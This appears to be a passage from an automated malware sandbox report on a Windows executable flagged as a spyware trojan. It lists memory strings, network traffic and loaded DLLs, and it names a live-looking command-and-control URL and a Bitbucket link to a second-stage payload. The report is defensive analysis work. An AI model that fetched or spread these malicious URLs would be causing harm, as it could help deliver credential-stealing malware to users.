                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614800650.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037949478.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: fr2Mul3G6m.exe, fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614413727.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037907014.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037949478.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037494463.00000000008FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeF
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614413727.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037907014.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/n
                Source: fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614711892.0000000005347000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2039826381.0000000005348000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614183822.0000000005333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: fr2Mul3G6m.exe, fr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1452413726.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1346689010.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1346689010.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456874953.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1401425520.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1428862536.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510232310.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1457495731.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1399750303.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037927496.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1431626589.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: fr2Mul3G6m.exe, 00000005.00000003.1428862536.0000000000BCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/F
                Source: fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/U
                Source: fr2Mul3G6m.exe, fr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456874953.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1509909217.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614800650.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1346689010.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510232310.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510091812.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037949478.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1431626589.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1374607576.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510348815.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1452413726.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apial
                Source: fr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiit
                Source: fr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/d
                Source: fr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/ero
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456551411.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1457495731.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/es
                Source: fr2Mul3G6m.exe, 00000005.00000003.1457495731.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1509909217.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456551411.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1457495731.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510348815.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/r7
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1509909217.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510348815.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037927496.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/x
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: fr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: fr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614711892.0000000005347000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2039826381.0000000005348000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614183822.0000000005333000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-
                Source: fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614800650.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037949478.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: fr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: fr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: fr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: fr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: fr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.10:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.25.145:443 -> 192.168.2.10:49774 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: fr2Mul3G6m.exeStatic PE information: section name:
                Source: fr2Mul3G6m.exeStatic PE information: section name: .rsrc
                Source: fr2Mul3G6m.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2000
                Source: fr2Mul3G6m.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: fr2Mul3G6m.exeStatic PE information: Section: ZLIB complexity 0.9973445526541096
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7248
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3fbc6697-ef89-4a30-b290-350ac11c0359Jump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: fr2Mul3G6m.exe, 00000005.00000003.1348643365.000000000533B000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1375525659.0000000005362000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1348251206.0000000005356000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: fr2Mul3G6m.exeReversingLabs: Detection: 60%
                Source: fr2Mul3G6m.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: fr2Mul3G6m.exeString found in binary or memory: JevRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile read: C:\Users\user\Desktop\fr2Mul3G6m.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\fr2Mul3G6m.exe "C:\Users\user\Desktop\fr2Mul3G6m.exe"
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2000
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeSection loaded: userenv.dllJump to behavior
